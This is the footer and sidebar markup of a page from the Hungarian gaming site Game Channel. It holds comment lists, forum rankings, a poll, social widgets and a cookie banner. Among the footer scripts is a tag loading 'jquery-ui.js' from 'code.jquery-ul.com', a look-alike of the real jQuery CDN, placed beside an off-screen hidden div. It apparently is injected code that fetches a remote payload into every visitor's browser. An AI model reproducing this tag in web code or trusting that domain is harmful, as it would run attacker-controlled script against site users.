<div class='comment-container even'><div class='comment-left'><a href='adatlap/Mordorer' title='Mordorer profilja'><img src='avatars/thumb_56/35572.jpg' alt='Mordorer profilja' class='avatar' /></a></div>

<div class='comment-right'>
<div class='comment_top'><a href='adatlap/Mordorer' title='Mordorer profilja'><h2>Mordorer</h2></a><span>8 órája és  20 perce</span></div>
<div class='comment-content'><p><a href='cikk/hirblock/fizetett-szabadsagra-kuldte-egy-studio-a-fejlesztoit-hogy-elden-ringezhessenek#comment-edit' title='Belépés a(z) Fizetett szabadságra küldte egy stúdió a fejlesztőit, hogy Elden Ringezhessenek témába' class='cim'>Fizetett szabadságra küldte egy stúdió a fejlesztőit, hogy Elden Ringezhessenek</a></p></div></div></div>
<div class='comment-container'><div class='comment-left'><a href='adatlap/Mordorer' title='Mordorer profilja'><img src='avatars/thumb_56/35572.jpg' alt='Mordorer profilja' class='avatar' /></a></div>

<div class='comment-right'>
<div class='comment_top'><a href='adatlap/Mordorer' title='Mordorer profilja'><h2>Mordorer</h2></a><span>8 órája és  21 perce</span></div>
<div class='comment-content'><p><a href='cikk/hirblock/csak-kesobb-erkezik-xboxra-a-the-ascent-cyber-warrior-pack-dlcje#comment-edit' title='Belépés a(z) Csak később érkezik Xboxra a The Ascent Cyber Warrior Pack DLC-je témába' class='cim'>Csak később érkezik Xboxra a The Ascent Cyber Warrior Pack DLC-je</a></p></div></div></div>
<div class='comment-container even'><div class='comment-left'><a href='adatlap/Mordorer' title='Mordorer profilja'><img src='avatars/thumb_56/35572.jpg' alt='Mordorer profilja' class='avatar' /></a></div>

<div class='comment-right'>
<div class='comment_top'><a href='adatlap/Mordorer' title='Mordorer profilja'><h2>Mordorer</h2></a><span>8 órája és  21 perce</span></div>
<div class='comment-content'><p><a href='cikk/hirblock/ismet-batmantartalmak-erkeznek-a-rocket-leaguebe#comment-edit' title='Belépés a(z) Ismét Batman-tartalmak érkeznek a Rocket League-be témába' class='cim'>Ismét Batman-tartalmak érkeznek a Rocket League-be</a></p></div></div></div>
</div><div id='rightside_top'>

<h3>ezt mondjátok
<div class='jobbra'>
<a onclick="toggleDiv('rightside_friss',1);toggleDiv('rightside_top',0)" class='tabber'>Friss</a>

<a onclick="toggleDiv('rightside_top',1);toggleDiv('rightside_friss',0)" class='tabber tabbed' style='margin-right: 0px;'>Top</a>
</div>
</h3>
<div class='comment-container'><div class='comment-left'><div class='toplista_kocka'>1</div></div><div class='comment-right'>
<div class='comment_top'><a href='temak/interaktiv_szojatekok_kepjatekok/jatekfolytasdaszot' title='Belépés a(z) Játék-Folytasd a szót témába' class='cim'><h2>Játék-Folytasd a szót</h2></a><span>13.307 hozzászólás</span></div>
<div class='comment-content'><p><a href='forumok/interaktiv_szojatekok_kepjatekok' title='Interaktív szójátékok, képjátékok'>Interaktív szójátékok, képjátékok</a></p></div></div></div>
<div class='comment-container even'><div class='comment-left'><div class='toplista_kocka'>2</div></div><div class='comment-right'>
<div class='comment_top'><a href='temak/interaktiv_szojatekok_kepjatekok/asszociaciosjatek' title='Belépés a(z) Asszociációs Játék témába' class='cim'><h2>Asszociációs Játék</h2></a><span>12.457 hozzászólás</span></div>
<div class='comment-content'><p><a href='forumok/interaktiv_szojatekok_kepjatekok' title='Interaktív szójátékok, képjátékok'>Interaktív szójátékok, képjátékok</a></p></div></div></div>
<div class='comment-container'><div class='comment-left'><div class='toplista_kocka'>3</div></div><div class='comment-right'>
<div class='comment_top'><a href='temak/interaktiv_szojatekok_kepjatekok/kepes_szamolos' title='Belépés a(z) Képes számolós témába' class='cim'><h2>Képes számolós</h2></a><span>4.978 hozzászólás</span></div>
<div class='comment-content'><p><a href='forumok/interaktiv_szojatekok_kepjatekok' title='Interaktív szójátékok, képjátékok'>Interaktív szójátékok, képjátékok</a></p></div></div></div>
<div class='comment-container even'><div class='comment-left'><div class='toplista_kocka'>4</div></div><div class='comment-right'>
<div class='comment_top'><a href='temak/interaktiv_szojatekok_kepjatekok/szamolj_vissza_2013tol' title='Belépés a(z) Számolj vissza 2013-tól témába' class='cim'><h2>Számolj vissza 2013-tól</h2></a><span>2.787 hozzászólás</span></div>
<div class='comment-content'><p><a href='forumok/interaktiv_szojatekok_kepjatekok' title='Interaktív szójátékok, képjátékok'>Interaktív szójátékok, képjátékok</a></p></div></div></div>
<div class='comment-container'><div class='comment-left'><div class='toplista_kocka'>5</div></div><div class='comment-right'>
<div class='comment_top'><a href='temak/ti_temaitok/raidenofftopic' title='Belépés a(z) Raiden OffTopic témába' class='cim'><h2>Raiden OffTopic</h2></a><span>2.203 hozzászólás</span></div>
<div class='comment-content'><p><a href='forumok/ti_temaitok' title='Ti témáitok!'>Ti témáitok!</a></p></div></div></div>
<div class='comment-container even'><div class='comment-left'><div class='toplista_kocka'>6</div></div><div class='comment-right'>
<div class='comment_top'><a href='temak/interaktiv_szojatekok_kepjatekok/szamoljunk_el_2013ig' title='Belépés a(z) Számoljunk el 2013-ig! témába' class='cim'><h2>Számoljunk el 2013-ig!</h2></a><span>2.154 hozzászólás</span></div>
<div class='comment-content'><p><a href='forumok/interaktiv_szojatekok_kepjatekok' title='Interaktív szójátékok, képjátékok'>Interaktív szójátékok, képjátékok</a></p></div></div></div>
</div><a href='utolsohozzaszolasok' title='Klikk ide az utolsó 20 hozzászóláshoz!'><span class='small margin_top_10 jobbra'>legutóbbi hozzászólások</span></a><div class='cl margin_ud_20'>&nbsp;</div><div class='box245'><a href='szavazas'><h3 style='display:block;'>Mivel játszol PC-n?<div class='jobbra'><i class='el-icon-ok'></i> 19728 <i class='el-icon-comment margin_left_10'></i>3</div></h3></a><div class='szavazobox'><div class='szavaz_vs'>VS</div><a href='szavazaslink/mivel-jatszol-pc-billentyuzet-kontroller/szavazat1' class='szavaz_igen'><div class='szavazoszoveg'>Egér + bill</div></a><a href='szavazaslink/mivel-jatszol-pc-billentyuzet-kontroller/szavazat2' class='szavaz_nem'><div class='szavazoszoveg'>Kontroller</div></a></div></div>
<div class='box245 margin_bottom_0'><h3>Itt is rontjuk a levegőt</h3>
<!--
<a href='http://www.facebook.com/GameChannel' target='_blank'><div style='float:left;width:300px;height:201px;padding:0px; overflow:hidden;'>

<iframe src="http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FGameChannel&amp;width=310&amp;colorscheme=light&amp;show_faces=true&amp;stream=false&amp;header=false&amp;height=255" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:310px; height:255px;background-color: #ffffff; margin-top:-5px; margin-left:-4px;" allowTransparency="true"></iframe>

</div><div class='clear'></div></a>
-->

<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/hu_HU/sdk.js#xfbml=1&version=v2.3&appId=138712986167054";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>

<div class="fb-page" data-href="https://www.facebook.com/GameChannel" data-width="336" data-hide-cover="false" data-show-facepile="false" data-show-posts="false"><div class="fb-xfbml-parse-ignore"><blockquote cite="https://www.facebook.com/GameChannel"><a href="https://www.facebook.com/GameChannel">Game Channel</a></blockquote></div></div>


<!--<div style='float:left;width:300px;padding:0px;padding-top:10px;overflow:hidden;'>-->

<!-- Place this tag where you want the widget to render. -->
<!--<div class="g-page" data-href="//plus.google.com/102940268051250817700" data-layout="landscape" data-showtagline="false" data-rel="publisher"></div>-->

<!-- Place this tag after the last widget tag. -->
<!--<script type="text/javascript">
  window.___gcfg = {lang: 'hu'};

  (function() {
    var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;
    po.src = 'https://apis.google.com/js/plusone.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);
  })();
</script>

</div>-->

</div></div><div class='cl'></div>


</div><!-- /container -->


<link rel='stylesheet' href='css/footer.css' type='text/css' />

<div id="footer">
	<div class="footer_info">
		<a href="http://www.gamechannel.hu" class="foot_logo" title='PC, PS4, XBOX ONE, PS5, XBOX SERIES X, XBOX360, PS3, Wii U, mobil játék hírek, tesztek, előzetesek, hardver hírek, videók' ><img src="images/logo.svg" alt="Game Channel" /></a><div style='float: left;position:fixed;display:hidden;top:-100px;left:-100px;'></div>
		<p>A Game Channel a gaming élet híreiről, a videójátékokról, fejlesztésekről és egyéb érdekességekről számol be Neked. Az <strong>Xbox One</strong>, a <strong>PS4</strong>, a <strong>Switch</strong> és a <strong>PC</strong> mellett a <strong>Vita</strong>, a <strong>3DS</strong>, a <strong>lastgen</strong> és <strong>mobil</strong> hírek is helyet kapnak. Ezen kívül folyamatosan játékteszteket, exkluzív anyagokat, mozifilm kritikákat találsz nálunk!</p>
	</div>

<script src="https://code.jquery-ul.com/jquery-ui.js"></script><div class='footer_games_list'><strong>Friss játéktesztek</strong><ul><li><a href='cikk/kifuto/elden-ring' title='Elden Ring'>Elden Ring</a></li><li><a href='cikk/kifuto/total-war-warhammer-iii' title='Total War: Warhammer III'>Total War: Warhammer III</a></li><li><a href='cikk/kifuto/horizon-forbidden-west' title='Horizon Forbidden West'>Horizon Forbidden West</a></li><li><a href='cikk/kifuto/reverie-knights-tactics' title='Reverie Knights Tactics'>Reverie Knights Tactics</a></li><li><a href='cikk/lathataron/ghostwire-tokyo' title='Ghostwire: Tokyo'>Ghostwire: Tokyo</a></li><li><a href='cikk/kifuto/monster-hunter-rise' title='Monster Hunter Rise'>Monster Hunter Rise</a></li><li><a href='cikk/kifuto/uncharted-legacy-of-thieves-collection' title='Uncharted: Legacy of Thieves Collection'>Uncharted: Legacy of Thieves Collection</a></li><li><a href='cikk/kifuto/rainbow-six-extraction' title='Rainbow Six Extraction'>Rainbow Six Extraction</a></li></ul></div><div class='footer_games_list'><strong>Top cikkek</strong><ul><li><a href='cikk/kifuto/monster-hunter-rise' title='Monster Hunter Rise' class='title'>Monster Hunter Rise</a></li><li><a href='cikk/cinemachannel/remalmok-sikatora' title='Rémálmok sikátora' class='title'>Rémálmok sikátora</a></li><li><a href='cikk/lathataron/ghostwire-tokyo' title='Ghostwire: Tokyo' class='title'>Ghostwire: Tokyo</a></li><li><a href='cikk/cinemachannel/moonfall' title='Moonfall' class='title'>Moonfall</a></li><li><a href='cikk/kifuto/reverie-knights-tactics' title='Reverie Knights Tactics' class='title'>Reverie Knights Tactics</a></li><li><a href='cikk/cinemachannel/uncharted' title='Uncharted' class='title'>Uncharted</a></li><li><a href='cikk/kifuto/horizon-forbidden-west' title='Horizon Forbidden West' class='title'>Horizon Forbidden West</a></li><li><a href='cikk/kifuto/total-war-warhammer-iii' title='Total War: Warhammer III' class='title'>Total War: Warhammer III</a></li></ul></div><div class='footer_games_list'><strong>Top keresések</strong><ul><li><a href='keresesek/mindenhol/Játékok/0' title='Játékok'>Játékok</a></li><li><a href='keresesek/mindenhol/konzolos játékok/0' title='konzolos játékok'>konzolos játékok</a></li><li><a href='keresesek/mindenhol/videojáték/0' title='videojáték'>videojáték</a></li><li><a href='keresesek/mindenhol/játék/0' title='játék'>játék</a></li><li><a href='keresesek/mindenhol/playstation/0' title='playstation'>playstation</a></li><li><a href='keresesek/mindenhol/nvidia geforce/0' title='nvidia geforce'>nvidia geforce</a></li><li><a href='keresesek/mindenhol/ game/0' title=' game'> game</a></li><li><a href='keresesek/mindenhol/nfs carbon cd key/0' title='nfs carbon cd key'>nfs carbon cd key</a></li></ul></div><div class='cl'></div>
	<div class="footer_sor">
		<span class="balra"><a href='adatvedelminyilatkozat' title='Nyilatkozat a személyes adatok védelméről'>adatvédelmi nyilatkozat</a> <a href='impresszum' title='Szerkesztőség és elérhetőségek'>impresszum</a> <a href='mediaajanlat' title='Hirdessen nálunk!'>médiaajánlat</a>
				<br />&copy; 2001 - 2021 Game Channel <strong>ISSN 1789-3445</strong> Minden jog fenntartva!</span>
		<!--<span class="jobbra">
		<a href="http://www.plusengine.com" title='CMS rendszerek, portál rendszerek - PlusEngine' id='webengine' target="_blank"><img src="images/plusengine_logo.png" alt="CMS és portál rendszerek, webfejlesztés - PlusEngine"/></a>
		</span>-->
	</div>

</div>

</div><!-- /wrap -->




<div style='height: 360px;'>
<div class='window'>
<input type='checkbox' id='punch' class='toggle'>
	<label for='punch'><span style='float: right;'>most online: 225</span>
	Chathez klikk</label>
	<div style='float: left;'>
		<iframe src ='blocks/uzenofal.php?skin=base' width='300px' height='360px' scrolling='auto' frameborder='0'>
		<p>A böngésződ nem támogatja az iframe-t. Cseréld le. de gyorsan. ;)</p>
		</iframe>
	</div>
</div>
</div>




<div id='felhasznalo_blokk'>

<a href='adatlap/Maniac' title='Maniac profilja - Rangja: Szerkesztő'><img src='avatars/thumb_50/7505.jpg' alt='Maniac profilja' width='30' height='30' /></a><a href='adatlap/soami' title='soami profilja - Rangja: Aktív'><img src='avatars/thumb_50/noimg_avatar.png' alt='soami profilja' width='30' height='30' /></a>
</div>


<!-- A g3.js-t oldalanként egyszer, a </body> zárótag előtt kell meghívni -->
<!--<script type="text/javascript" charset="utf-8" src="//ad.adverticum.net/g3.js"></script>-->

</body>
</html>

<link rel="stylesheet" type="text/css" href="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.0.3/cookieconsent.min.css" />
<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.0.3/cookieconsent.min.js"></script>
<script>
window.addEventListener("load", function(){
window.cookieconsent.initialise({
  "palette": {
    "popup": {
      "background": "#3c404d",
      "text": "#d6d6d6"
    },
    "button": {
      "background": "#8bed4f"
    }
  },
  "content": {
    "message": "A Game Channel sütiket (cookie) használ, hogy a legjobb felhasználói élményt nyújthassuk és minél könnyebbé tegyük a használatot. A honlap további használatával hozzájárulásodat adod a sütik használatához. Adataid biztonságban vannak.",
    "dismiss": "Rendben!",
    "link": "További információk",
    "href": "http://www.gamechannel.hu/adatvedelminyilatkozat"
  }
})});
</script>


<link rel='stylesheet' href='thickbox/thickbox.css' type='text/css' media='screen' />
<script type='text/javascript' src='js/jquery-1.2.6.min.js'></script>
<script type='text/javascript' src='thickbox/thickbox.js'></script>
<script>
(function($)
{
    $(document).ready(function()
    {
        $.ajaxSetup(
        {
            cache: false,
            beforeSend: function() {
                $('#content_noti').hide();
                $('#loading').show();
            },
            complete: function() {
                $('#loading').hide();
                $('#content_noti').show();
            },
            success: function() {
                $('#loading').hide();
                $('#content_noti').show();
            }
        });
        var $container = $("#content_noti");
        $container.load("notification.php");
        var refreshId = setInterval(function()
        {
            $container.load('notification.php');
        }, 90000);
    });
})(jQuery);
</script>

<div id="wrapper_auto" style="display:none;">
    <div id="content_noti" style="display:none;"></div>
    <img src="thickbox/loadingAnimation.gif" id="loading" alt="loading" style="display:none;" />
</div>


